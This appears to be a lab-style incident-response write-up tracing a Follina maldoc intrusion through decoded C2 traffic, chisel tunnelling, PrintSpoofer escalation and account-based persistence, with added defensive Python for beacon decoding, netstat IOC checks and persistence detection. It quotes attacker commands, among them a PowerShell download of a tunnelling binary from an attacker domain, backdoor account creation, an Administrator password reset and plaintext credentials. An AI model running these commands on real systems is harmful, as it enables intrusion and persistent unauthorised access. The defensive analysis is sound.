You are tasked with investigating a workstation affected by a full attack chain.
CONTEXT
I. Background
In this incident, you will act as an Incident Responder following up on an alert triaged by one of your Security Operations Center analysts. The analyst has confirmed that the alert has CRITICAL severity and needs further investigation.
As reported by the SOC analyst, the intrusion started from a malicious document. In addition, the analyst compiled the essential information generated by the alert as listed below:
The malicious document has a .doc extension.
The user downloaded the malicious document via chrome.exe.
The malicious document then executed a chain of commands to attain code execution.
A maldoc was found to have been downloaded onto the workstation via the browser. This was confirmed by file-creation logs (Sysmon Event ID 11) whose source process is chrome.exe.
The decoded payload downloads a file, update.zip, into the Startup folder and then extracts it into the same directory. That the execution ran in PowerShell, and that sdiagnhost.exe wrote the file to the Startup folder, confirms abuse of the Follina exploit.
Based on the initial findings, we discovered that there is a stage 2 execution:
The document has successfully executed an encoded base64 command.
Decoding this string reveals the exact command chain executed by the malicious document.
As the file, update.zip, was written in the Startup folder, login activities of the compromised user (benimaru) were monitored and processes spawned by winlogon.exe were traced.
Based on the collected findings, we discovered that the attacker fetched the stage 2 payload remotely:
We discovered the domain and IP invoked by the malicious document in the Sysmon logs.
Another domain and IP, used by the stage 2 payload, was logged from the same data source.
Network traffic related to the execution of first.exe shows requests to the URI path /9ab62b5:
$ tshark -r capture.pcapng -Y "ip.dst==167.71.222.162 and http" | head -n 1
 5159 227.738875 192.168.254.107 → 167.71.222.162 HTTP 161 GET /9ab62b5 HTTP/1.1

$ tshark -r capture.pcapng -Y "frame.number==5159" -T json | jq -r '.[]."_source".layers.http | with_entries(if (.key|test("http.*")) then ({key: .key, value: .value}) else empty end)'
{
  "http.host": "resolvecyber.xyz",
  "http.request.line": "user-agent: Nim httpclient/1.6.6\r\n",
  "http.connection": "Keep-Alive",
  "http.user_agent": "Nim httpclient/1.6.6",
  "http.request.full_uri": "http://resolvecyber.xyz/9ab62b5",
  "http.request": "1",
  "http.request_number": "1"
}
Requests carrying the GET parameter ?q= are also seen, with base64-encoded payloads:
$ tshark -r capture.pcapng -Y "ip.dst==167.71.222.162 and http" -T fields -e http.request.uri
/9ab62b5
/9ab62b5?q=d2hvYW1pIC0gdGVtcGVzdFxiZW5pbWFydQ0K
/9ab62b5
/9ab62b5?q=cHdkIC0gDQpQYXRoICAgICAgICAgICAgICAgDQotLS0tICAgICAgICAgICAgICAgDQpDOlxXaW5kb3dzXHN5c3RlbTMyDQoNCg0K
/9ab62b5
[..omitted..]
II. Discovery
Based on the collected findings, we have discovered that the malicious binary communicates continuously with the C2 server:
We can easily decode the encoded string in the network traffic.
The traffic contains the command and output executed by the attacker.
HTTP requests with base64-encoded payloads were parsed and decoded using the following command:
$ for i in $(tshark -r capture.pcapng -Y '(ip.dst==167.71.222.162 and tcp.port eq 80) and frame contains "?q="' -T fields -e http.request.uri | cut -d'=' -f2); do
> echo $i | base64 -d;
> done
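The shell loop above needs the capture file. As an added example (not part of the original write-up), the following Python script performs the same decoding offline against constructed sample lines in the format that `tshark -T fields -e http.request.uri` prints. It also separates each beacon into the command and its output: splitting on the first " - " is an assumption drawn from the two decoded values quoted above ("whoami - tempest\benimaru" and "pwd - ..."), not a documented feature of the binary.

```python
import base64
import binascii
from urllib.parse import unquote, urlsplit

# Constructed sample: request URIs as printed by
#   tshark -r capture.pcapng -Y "... and http" -T fields -e http.request.uri
# The two encoded values are the ones quoted in the report; the last line is a
# deliberately corrupt value so the error path is exercised.
SAMPLE_URIS = """\
/9ab62b5
/9ab62b5?q=d2hvYW1pIC0gdGVtcGVzdFxiZW5pbWFydQ0K
/9ab62b5
/9ab62b5?q=cHdkIC0gDQpQYXRoICAgICAgICAgICAgICAgDQotLS0tICAgICAgICAgICAgICAgDQpDOlxXaW5kb3dzXHN5c3RlbTMyDQoNCg0K
/9ab62b5?q=this-is-not-base64
"""


def q_values(uri):
    """Yield every q= value of a request URI.

    The query string is split by hand rather than with parse_qs, because
    parse_qs turns '+' into a space and '+' is a valid base64 character.
    """
    for part in urlsplit(uri).query.split("&"):
        key, sep, value = part.partition("=")
        if sep and key == "q":
            yield unquote(value)


def decode_q(value):
    """Base64-decode one q= value, re-adding any padding that was stripped.

    Returns the decoded text, or None when the value is not valid base64
    (the equivalent of the 'base64: invalid input' message from the shell loop).
    """
    padded = value + "=" * (-len(value) % 4)
    try:
        raw = base64.b64decode(padded, validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-8", errors="replace")


def parse_beacon(decoded):
    """Split '<command> - <output>' into (command, output).

    Assumption: the separator is the first ' - ' after the command, as seen in
    the two decoded samples. Output line endings are normalised to '\\n'.
    """
    cmd, sep, out = decoded.partition(" - ")
    if not sep:
        return decoded.strip(), ""
    return cmd.strip(), out.replace("\r\n", "\n").strip()


def extract_beacons(uri_text):
    """Return (command, output) for every request that carries a q= payload.

    Requests without q= are plain polling beacons and are skipped; values that
    do not decode are reported as ('<undecodable>', raw_value) instead of
    aborting the whole pass.
    """
    results = []
    for line in uri_text.splitlines():
        line = line.strip()
        if not line:
            continue
        for value in q_values(line):
            decoded = decode_q(value)
            if decoded is None:
                results.append(("<undecodable>", value))
            else:
                results.append(parse_beacon(decoded))
    return results


if __name__ == "__main__":
    for cmd, out in extract_beacons(SAMPLE_URIS):
        print(f"> {cmd}")
        if out:
            print(out)
```

Note that `cut -d'=' -f2` in the shell loop also discards any trailing `=` padding of the base64 value (it is split on the same character), and GNU `base64 -d` rejects unpadded input with "invalid input"; re-padding in `decode_q` is one way to avoid that when feeding the whole request stream through a decoder.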
The threat actor was then seen to have achieved Remote Code Execution (RCE) with a non-interactive webshell. Initial enumeration included their current user context, existing user directories, as well as local users and administrators:
> whoami
tempest\benimaru
> pwd
Path
----
C:\Windows\system32
> dir C:\Users

    Directory: C:\Users

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        6/20/2022   9:06 PM                benimaru
d-r---        6/20/2022   4:03 PM                Public
d-----        6/20/2022  11:52 PM                rimuru
> net users
User accounts for \\TEMPEST
-------------------------------------------------------------------------------
Administrator            benimaru                 DefaultAccount
Guest                    rimuru                   WDAGUtilityAccount
The command completed successfully.
> net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
rimuru
The command completed successfully.
> net user benimaru
User name                    benimaru
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never
Password last set            6/20/2022 9:18:04 PM
Password expires             Never
Password changeable          6/20/2022 9:18:04 PM
Password required            No
User may change password     Yes
Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   6/21/2022 1:14:49 AM
Logon hours allowed          All
Local Group Memberships      *Remote Management Use*Users
Global Group memberships     *None
The command completed successfully.
Next, they began exploring the current user context's home directory:
> dir C:\Users\benimaru

    Directory: C:\Users\benimaru

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        6/20/2022   4:13 PM                3D Objects
d-r---        6/20/2022   4:13 PM                Contacts
d-r---        6/21/2022  12:27 AM                Desktop
d-r---        6/20/2022   9:20 PM                Documents
d-r---        6/21/2022   1:13 AM                Downloads
d-r---        6/20/2022   4:13 PM                Favorites
d-r---        6/20/2022   4:13 PM                Links
d-r---        6/20/2022   4:13 PM                Music
dar---        6/21/2022   1:15 AM                OneDrive
d-r---        6/20/2022   4:13 PM                Pictures
d-r---        6/20/2022   4:13 PM                Saved Games
d-r---        6/20/2022   4:13 PM                Searches
d-r---        6/20/2022   5:57 PM                Videos
> dir C:\Users\benimaru\documents
> dir C:\users\benimaru\Desktop

    Directory: C:\users\benimaru\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        6/20/2022  11:34 PM            268 automation.ps1
-a----        6/20/2022   4:13 PM           1446 Microsoft Edge.lnk
> cat C:\Users\Benimaru\Desktop\automation.ps1
A file, automation.ps1, was discovered that contains the credentials of the user benimaru in plaintext:
$user = "TEMPEST\benimaru"
$pass = "infernotempest"
$securePassword = ConvertTo-SecureString $pass -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $user, $securePassword
## TODO: Automate easy tasks to hack working hours
Following the user enumeration, network-related information was then gathered:
> netstat -ano -p tcp

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       864
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5040           0.0.0.0:0              LISTENING       5508
  TCP    0.0.0.0:5357           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:7680           0.0.0.0:0              LISTENING       4964
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       476
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       1212
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       1760
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       2424
  TCP    0.0.0.0:49671          0.0.0.0:0              LISTENING       624
  TCP    0.0.0.0:49676          0.0.0.0:0              LISTENING       608
  TCP    192.168.254.107:139    0.0.0.0:0              LISTENING       4
  TCP    192.168.254.107:51802  52.139.250.253:443     ESTABLISHED     3216
  TCP    192.168.254.107:51839  34.104.35.123:80       TIME_WAIT       0
  TCP    192.168.254.107:51858  104.101.22.128:80      TIME_WAIT       0
  TCP    192.168.254.107:51860  20.205.146.149:443     TIME_WAIT       0
  TCP    192.168.254.107:51861  204.79.197.200:443     ESTABLISHED     4352
  TCP    192.168.254.107:51871  20.190.144.169:443     TIME_WAIT       0
  TCP    192.168.254.107:51876  52.178.17.2:443        ESTABLISHED     4388
  TCP    192.168.254.107:51878  20.60.178.36:443       ESTABLISHED     4388
  TCP    192.168.254.107:51881  52.109.124.115:443     ESTABLISHED     4388
  TCP    192.168.254.107:51882  52.139.154.55:443      ESTABLISHED     4388
  TCP    192.168.254.107:51884  40.119.211.203:443     ESTABLISHED     4388
  TCP    192.168.254.107:51895  52.152.90.172:443      ESTABLISHED     5508
  TCP    192.168.254.107:51896  20.44.229.112:443      ESTABLISHED     8904
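The same netstat listing is what the attacker used to learn that TCP port 5985 (WinRM) was open, and it is also what a responder would triage. As an added example (not from the original write-up), the following Python script parses `netstat -ano -p tcp` output, flags listening remote-management ports, and reports any connection whose foreign address is one of the C2 addresses named in this report (167.71.222.162 and 167.71.199.191). The sample text is constructed: the listener rows copy values from the listing above, while the final ESTABLISHED row to 167.71.199.191:8080 and its PID 7412 are invented so the IOC check has something to find.

```python
import re
from collections import namedtuple

Conn = namedtuple("Conn", "laddr lport raddr rport state pid")

# Constructed sample in the layout of `netstat -ano -p tcp`. The listener rows
# copy values from the workstation listing; the last row is a constructed
# connection to the reverse-proxy endpoint named in this report.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       864
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    192.168.254.107:51802  52.139.250.253:443     ESTABLISHED     3216
  TCP    192.168.254.107:51839  34.104.35.123:80       TIME_WAIT       0
  TCP    192.168.254.107:52001  167.71.199.191:8080    ESTABLISHED     7412
"""

# Listening ports that let someone administer the host remotely; on a user
# workstation each one needs a business justification.
MANAGEMENT_PORTS = {
    3389: "RDP",
    5985: "WinRM over HTTP",
    5986: "WinRM over HTTPS",
    47001: "WinRM service listener (HTTP.sys)",
}

# Attacker infrastructure named in this report.
KNOWN_C2 = {"167.71.222.162", "167.71.199.191"}

# One TCP row: local addr:port, foreign addr:port, state, PID. Only TCP rows
# are parsed; UDP rows (printed without -p tcp) have no State column.
TCP_ROW = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\S+)\s+(\d+)\s*$")


def parse_netstat(text):
    """Turn `netstat -ano -p tcp` text into a list of Conn records."""
    conns = []
    for line in text.splitlines():
        m = TCP_ROW.match(line)
        if m:
            laddr, lport, raddr, rport, state, pid = m.groups()
            conns.append(Conn(laddr, int(lport), raddr, int(rport), state, int(pid)))
    return conns


def management_listeners(conns):
    """Map listening management port -> (description, owning PID)."""
    return {
        c.lport: (MANAGEMENT_PORTS[c.lport], c.pid)
        for c in conns
        if c.state == "LISTENING" and c.lport in MANAGEMENT_PORTS
    }


def c2_connections(conns, iocs=KNOWN_C2):
    """Connections in any state whose foreign address is a known C2 host."""
    return [c for c in conns if c.raddr in iocs]


if __name__ == "__main__":
    conns = parse_netstat(SAMPLE_NETSTAT)
    for port, (desc, pid) in sorted(management_listeners(conns).items()):
        print(f"listener {port:>5}  {desc} (pid {pid})")
    for c in c2_connections(conns):
        print(f"C2 contact {c.laddr}:{c.lport} -> {c.raddr}:{c.rport} {c.state} pid {c.pid}")
```

The PID column is the pivot: a flagged connection's PID can be matched against Sysmon process-creation events to identify the binary (here, the chisel client) without relying on the process name alone.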
Finally, the threat actor downloaded chisel (a tunnelling tool commonly used as a SOCKS proxy) onto the workstation:
> powershell iwr http://phishteam.xyz/02dcf07/ch.exe -outfile C:\Users\benimaru\Downloads\ch.exe
base64: invalid input
> dir C:\Users\benimaru\Downloads\ch.exe

    Directory: C:\Users\benimaru\Downloads

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        6/21/2022   1:17 AM        8230912 ch.exe
A reverse socks proxy to 167.71.199.191:8080 was started:
Because the user benimaru belongs to the Remote Management Users group and TCP port 5985 is open on the workstation, the threat actor may have obtained remote access via WinRM. The logs below show all Network logons (LogonType 3) of the compromised user:
Based on the collected findings, the attacker gained a stable shell through a reverse socks proxy.
Executions were seen in the Sysmon logs but not in the captured network traffic. This leads to the assumption that the threat actor was able to establish a stable shell via WinRM.
The first execution was enumeration of privileges for the current user context (benimaru):
spf.exe was executed (to run final.exe afterwards); based on the executable's hash, it was identified as a PrintSpoofer exploit, which abuses impersonation privileges (SeImpersonatePrivilege). The threat actor was most likely tipped off to this after enumerating the user's privileges.
Now, the attacker has gained administrative privileges inside the machine. Find all persistence techniques used by the attacker.
In addition, the unusual executions are related to the malicious C2 binary used during privilege escalation.
Callbacks to 167.71.222.162:8080 were parsed and decoded using the following command:
$ for i in $(tshark -r capture.pcapng -Y '(ip.dst==167.71.222.162 and tcp.port eq 8080) and frame contains "?q="' -T fields -e http.request.uri | cut -d'=' -f2); do
> echo $i | base64 -d;
> done
Now, the current user context of the threat actor is NT AUTHORITY\SYSTEM, the highest-privileged local account on the workstation:
> whoami
nt authority\system
> pwd
Path
----
C:\Windows\system32
> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== =======
SeCreateTokenPrivilege                    Create a token object                                              Enabled
SeAssignPrimaryTokenPrivilege             Replace a process level token                                      Enabled
SeLockMemoryPrivilege                     Lock pages in memory                                               Enabled
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeTcbPrivilege                            Act as part of the operating system                                Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeCreatePermanentPrivilege                Create permanent shared objects                                    Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeAuditPrivilege                          Generate security audits                                           Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeTrustedCredManAccessPrivilege           Access Credential Manager as a trusted caller                      Enabled
SeRelabelPrivilege                        Modify an object label                                             Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
They attempted to add two new users, shuna and shion, but failed because the /add option was missing from the net user command:
> net user shuna pr1nc3ss!
> net user shion m4st3rch3f!
> net users
User accounts for \\
-------------------------------------------------------------------------------
Administrator            benimaru                 DefaultAccount
Guest                    rimuru                   WDAGUtilityAccount
The command completed with one or more errors.
This time around, with the correct command, the two users were successfully created:
> net user /add shuna princess
The command completed successfully.
> net user /add shion m4st3rch3f!
The command completed successfully.
> net users
User accounts for \\
-------------------------------------------------------------------------------
Administrator benimaru DefaultAccount
Guest rimuru shion
shuna WDAGUtilityAccount
The command completed with one or more errors.
Another thing the threat actor did for persistence was to change the local Administrator's password and add the new user, shion, to the local Administrators group:
> net user Administrator ch4ng3dpassword!
The command completed successfully.
> net localgroup administrators /add shion
The command completed successfully.
> net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
rimuru
shion
The command completed successfully.
The logs below confirm the creation of the two new users (Event ID 4720) as well as the addition of shion to the local Administrators group (Event ID 4732):
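To turn the persistence findings of this section, and the Startup-folder write from the Background section, into a repeatable check, the following Python script is an added example (not part of the original write-up). It runs four rules over constructed sample events: a Sysmon Event ID 11 file creation under a user's Startup folder, Security Event ID 4720 (account created), Event ID 4732 (member added to a local group, flagged for Administrators and the remote-access groups), and Event ID 4724 (password reset), which the page does not cite but which is the Security event generated by `net user Administrator <password>`. The event records are simplified dictionaries, not the real EventData schema; the timestamps, the subject account name TEMPEST$ and the PowerShell write of ch.exe are constructed.

```python
# Constructed sample events, reduced to the fields the rules below need.
# Real events come from the Security log (4720, 4732, 4724) and from Sysmon
# (Event ID 11); field names here are simplifications of the EventData names.
# "TEMPEST$" models the subject seen when commands run as NT AUTHORITY\SYSTEM.
SAMPLE_EVENTS = [
    {"time": "2022-06-21T01:03:55", "source": "Sysmon", "id": 11,
     "image": "C:\\Windows\\System32\\sdiagnhost.exe",
     "target": "C:\\Users\\benimaru\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\update.zip"},
    {"time": "2022-06-21T01:17:20", "source": "Sysmon", "id": 11,       # benign-looking write, must not fire
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "target": "C:\\Users\\benimaru\\Downloads\\ch.exe"},
    {"time": "2022-06-21T01:42:01", "source": "Security", "id": 4720,
     "subject": "TEMPEST$", "target": "shuna"},
    {"time": "2022-06-21T01:42:05", "source": "Security", "id": 4720,
     "subject": "TEMPEST$", "target": "shion"},
    {"time": "2022-06-21T01:43:10", "source": "Security", "id": 4724,
     "subject": "TEMPEST$", "target": "Administrator"},
    {"time": "2022-06-21T01:43:30", "source": "Security", "id": 4732,
     "subject": "TEMPEST$", "group": "Administrators", "member": "shion"},
    {"time": "2022-06-21T01:44:00", "source": "Security", "id": 4732,
     "subject": "TEMPEST$", "group": "Remote Desktop Users", "member": "shuna"},
]

# Path fragment common to every per-user Startup folder (case-insensitive match).
STARTUP_MARKER = "\\start menu\\programs\\startup\\"

# Local groups whose membership grants admin or remote-login rights.
PRIVILEGED_GROUPS = {"administrators", "remote management users", "remote desktop users"}


def check_event(e):
    """Return a finding string if the event matches a persistence rule, else None."""
    if e["source"] == "Sysmon" and e["id"] == 11:
        if STARTUP_MARKER in e["target"].lower():
            return f"file dropped in Startup folder by {e['image']}: {e['target']}"
        return None
    if e["source"] != "Security":
        return None
    if e["id"] == 4720:
        return f"local account created: {e['target']} (by {e['subject']})"
    if e["id"] == 4724 and e["target"].lower() == "administrator":
        return f"password reset on built-in Administrator (by {e['subject']})"
    if e["id"] == 4732 and e["group"].lower() in PRIVILEGED_GROUPS:
        return f"{e['member']} added to {e['group']} (by {e['subject']})"
    return None


def persistence_timeline(events):
    """Ordered list of (time, event id, finding) for every event that matched a rule."""
    hits = []
    for e in sorted(events, key=lambda ev: ev["time"]):
        finding = check_event(e)
        if finding is not None:
            hits.append((e["time"], e["id"], finding))
    return hits


if __name__ == "__main__":
    for time, event_id, finding in persistence_timeline(SAMPLE_EVENTS):
        print(f"{time}  {event_id:>5}  {finding}")
```

Sorting by time before applying the rules keeps the output in the same order as the attacker's actions, which makes it easy to confirm that the account creations preceded the group addition and the password reset, as the decoded C2 traffic in this section shows.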